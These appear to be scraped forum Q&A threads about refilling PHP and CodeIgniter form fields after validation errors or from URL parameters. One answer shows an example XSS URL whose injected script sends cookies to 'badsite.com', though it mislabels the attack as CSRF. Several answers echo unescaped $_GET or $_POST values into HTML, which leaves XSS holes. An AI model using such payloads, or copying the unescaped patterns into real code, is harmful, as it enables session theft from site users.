How can I ref-fill posted form data via PHP in the event of an error. I have a contact form and the user enters a bunch of information and if one field doesn't validate, he loses everything. How can I stop this from happening and make sure it is secure?
I've tried this, but believe I read somewhere it is not secure:
<input type="text" name="name" value="<?php echo $_POST['name']; ?>" />
One issue is that if $_POST['name'] contains a ", then the value can 'escape' out and rewrite the page content.
Another is that with strict error checking switched on, accessing a non-existent array index will throw a Notice error.
Here is one safe way of re-filling the form data:
<input type="text" name="name" value="<?php echo isset($_POST['name']) ? htmlspecialchars($_POST['name']) : ''; ?>" />
I would personally recommend handling form display and validation through a framework, like Zend_Form within the Zend Framework. (You won't have to change everything else across just to use the form stuff) It makes writing safe and readable code much easier.
Related
I have a have in PHP and I have common fields such as 'Name' and 'Surname'.
Now when the user visits the page e.g. http://www.example.com/form.php the form fields 'Name' and 'Surname' are empty.
I would like to now have a link similar to this http://www.example.com/form.php?name=John
so that when the client hits the link the PHP form will now have the name field already filled with 'John' in it.
I know this can be done in HTML but how can I do it in PHP?
Just to let to know I do not own the PHP form - I just want a link from my website to fill the PHP form (which I do not have control over).
Thanks in advance.
Can be done using $_GET
An associative array of variables passed to the current script via the URL parameters.
e.g.:
<? php
if(isset($_GET['name']))
{
$test = $_GET['name'];
}
?>
<html>
<body>
<form>
<input type="text" name="test" value="<?php if(isset($test)){echo "$test";}?>"/>
</form>
</body>
</html>
Note: code isnt tested or anything.. Also, there are possible security risks with getting values from your URL (can be considered user input), so make sure you are aware of that and how to prevent
You could store that value and then when you're about to output the input fields
you just pass along the stored value.
$name = $_GET['name'];
// ... later on
echo '<input type="text" value="'.$name.'"/>';
By using $_GET superglobal
<input name="name" value="<?php echo !empty($_GET['name']) ? $_GET['name'] : '';?>" />
<input name="surname" value="<?php echo !empty($_GET['surname']) ? $_GET['surname'] : '';?>" />
You can use the get method in php to get the name and make use of it
You can retrive this information by the $_GET["name"] function, or $_REQUEST["name"].
Reserver variables
Be carefull with those operations, you might have validation a/o security problem.
Note: if you are not sure that the "name" variable is set or not, you have to use also the
isset function to test it.
You can use the $_GET superglobal, so your input could look like this:
<input type="text" name="name" value="<?php if(isset($_GET['name'])) { echo $_GET['name']; } ?>" />
The $_REQUEST superglobal does a similar thing but I would just use $_GET.
It looks like everyone's answers here assume you are building the form yourself, which doesn't appear to be the case based on your question.
The thing that you want to do may or may not be possible. If the form accepts certain kinds of parameters in certain ways, you may be able to hook in to that functionality and set it up so that when someone clicks a link on your page, that information gets passed to the other page.
One way forms can accept this information is in the form of a "get" request. With this method, values are passed as part of the url, as in your example: http://www.example.com/form.php?name=John. Assuming your page has access to a php variable called $name, you can create a link from your code to build this kind of url like this:
Sign up!
If the page does not accept get parameters in this way (and I have a hard time imagining that they would), you may have to try other techniques to send along the information (assuming that they will even accept it!). The two other ways I imagine you could do this are by passing the value with "post" or creating a cookie for the page. If you tell us what page you are trying to set up this behavior on, we might be able to examine it and give you a better answer.
Ok, so this is a common scenario.
You have an html form that involves editing information. The original information comes from the database. When you post the form, it may not save the information immediately, because something may need fixing when the data-checking is done, maybe one of the required fields is left blank. As a result, you want to redisplay the form field, but if there was post data, display the post data, if not, display the original data from the database.
So I created a function to check post, then default to some arbitrary data (in this case from the database).
But overall, the approach feels inelegant, the POST data is being pulled invisibly inside the function from a global, but if I pass the post data in I have to pass it in for every function call, and it's almost as verbose as just doing it by hand each time, so specifically I'm looking for alternatives to this approach, and generally I'd love advice on better ways to deal with this form scenario that I deal with every single time I edit html forms.
// Pull from post or get, or else use data, e.g. from the database, to populate a form.
function in_or_data($index, $data, $trim=false){
return $_POST[$index]? ($trim ? trim($_POST[$index]) : $_POST[$index]) : $data[$index];
}
<?php
$item_name = in_or_data('item_name', $data_from_database_somewhere); // Pull post data, with defaults coming from the
?>
// ..... Later, some example html that just escapes & echoes out the data. .....
<td id='item-name'><input name="item_name" type="text" id="item_name" value="<?php echo escape($item_name); ?>" size="47" maxlength="100" tabindex="9"></td>
How can I improve dealing with forms that get their data either from the database initially, or from post after some kind of submission is being done?
<input type="text" name="abc" value="<?php array_key_exists('abc', $_REQUEST) ? $_REQUEST['abc'] : "default value goes here" ?>" />
A more elegant solution, though a serious amount of work, would involve using ajax (jquery, etc.) to perform server-side validation on the form BEFORE actually submitting.
What you are doing seems fine to me. Basically what I do in the same situation is have a hidden field in the form something like
<input name="is_edit"` ... />
and in my PHP just check for $_POST['is_edit'] so that I don't populate anything from the database. One problem with doing every field individually like you are doing it above is that for certain things (for example checkboxes) if the user doesn't check the checkbox, $_POST['checkbox_data'] is not going to be set, so I believe you would end up pulling that from the database using the function you have above. It should be either all or nothing that is pulled by the DB. I therefore do something like this:
<?php
if (isset($_POST['is_edit'])) {
$var1 = $_POST['var1'];
$var2 = $_POST['var2'];
// etc
}
else {
$data = do_db_query_and_get_data();
$var1 = $data['var1'];
$var2 = $data['var2'];
// etc
}
?>
<input type="something" value="<?php echo $var1; ?>" />
<input type="something" value="<?php echo $var2; ?>" />
<input type="hidden" name="is_edit" value="1" />
Doing it like this also has the other advantage of not having to do the database query unless it is necessary.
In addition to my initial php code, I have started using the html5 attributes like required and setting the html5 form types like number, email, etc. It has really really made my forms much better for browsers that support html5 form aspects, and it degrades to standard text boxes and ignores the required attribute in browsers that don't support html5 form stuff.
I want to prepopulate a form with variables from a url. How do I do this?
For example:
http://somewhere.com?name=john
Then the name field in a form would be prepopulated with "John", and if there was no name in the URL then the field would be empty and ready to be filled in.
Thanks in advance..
Well, using php, something like
<input type="text" name="name" value="<?php echo ((isset($_GET["name"]))?htmlspecialchars($_GET["name"]):""); ?>" />
I'm not sure how to parse out the get variables using javascript..
Also, remember to add the htmlspecialchars, to thwart csrf attacks.
If someone ran something like: http://example.com/form.php?name="><script>document.location.href = "http://badsite.com?cookies="+document.cookie;</script><class id="
Could turn out badly (just an example, not sure if it works).
The PHP way:
<input type="text" name="name" value="<?php echo htmlspecialchars($_GET["name"]); ?>"/>
For javascript, you should first find a way to retrieve GET variables. Have a look at this: How to get "GET" request parameters in JavaScript?
After you include the function proposed in the answer, you can do the following:
document.write('<input type="text" name="name" value="'
+ get('name')
+ '"/>');
You use the PHP $_GET['name'] value as the value of the form element. If there is no value set, the value will appear blank, which is what you want.
<input type="text" name="name" value="<?php echo $_GET['name']; ?>'" />
Server side is the best way to go (PHP or whatever language your coding in.) It alleviates client side performance issues and overall and is generally more reliable.
If you needed to use JavaScript though, you could do so with the help of this jQuery plugin (or look at the source to see what / how it gets the GET params from the current window.location.)
http://www.mathias-bank.de/2007/04/21/jquery-plugin-geturlparam-version-2/
Then use the $('input').val() function to set the value.
I'm new to code igniter. I'm following the form validation tutorial found at:
http://www.codeignitor.com/user_guide/libraries/validation.html
I find I am typing too much in the view to get the form to re-populate. For example, here's what one of my INPUT fields look like:
<input type="text" name="email" value="<?=$this->validation->email ? $this->validation->email : $array_db_values['email'] ?>" />
Basically, when the form first loads, it should show a value from the database. If the user alters the value and it fails validation, then the form should post the erroneously submitted value.
Does code igniter have a "cleaner" way of rendering this kind of output? Otherwise, I'm going to do something like this in my controller:
$array_db_values = getdbresults();
if($_POST['submit'])
foreach($_POST as $key=>$val)
$array_db_values[$key] = $val;
That way, if postback data exists, it will always override database values.
Then input fields in my view can simply be:
<input type="text" name="email" value="<?=$array_db_values['email'] ?>" />
Is there a better/native CI way to handle this scenario?
I don't think a easier way exists, the best way IMO is to do something like this in your controller:
if (isset($_POST['submit']))
{
$values = $_POST;
}
else
{
$values = getdbresults();
}
No need to loop through the $_POST array, for short:
$values = (isset($_POST['submit'])) ? $_POST : getdbresults();
In your view, you do the same:
<input type="text" name="email" value="<?=$values['email'] ?>" />
Or use the Form helper:
echo form_input('email', $values['email']);
Have you guys looked into the Datamapper Overzealous project?
http://www.overzealous.com/dmz/
It handles validation at the model level. In your form fields, you can set the value to come from the model (either from the database or from your previous post).
<input type='text' name='email' value='<?=$object->data_item ?>' />
I'm pretty new to CodeIgniter as well, but adding this library has made things much easier. That project also comes with a form extension that could really make things easier, but I haven't played much with it yet.
I'mm doing exactly the same as what you are doing. It's a bit cumbersome but not too bad imho.
I felt the same way about laboring over forms, check out macigniter's Form Lib in the Ignited Code forums. It saves a ton of time and is really well-written.
I have a picture upload inside a form...
The file is a php file btw...
Problem is whenever this form is filled in, and the user clicks to upload the first picture, the form is submitted to itself and all the fields which the user may have filled in will go blank...
I know of one way to do it, alot of 'isset' in my php code, but is there any simpler or maybe better way I don't know of?
Thanks
You echo back the POST variable on your fields.
<form method="POST">
<input type="text" name="name" value="<?php echo $_POST['name']?>" />
<input type="submit" name="submit" />
</form>
When the form is submitted to self, the same data will be filled.
Well i do not know of anything else. I always use this:
<input type="text" value="<?= isset($value) ? $value : ""; ?>">
I think it is not too much code in the Templates, but it does the Trick.
Alternatively you could use some Frameworks wich abstract everything for you, but i cannot recommend some...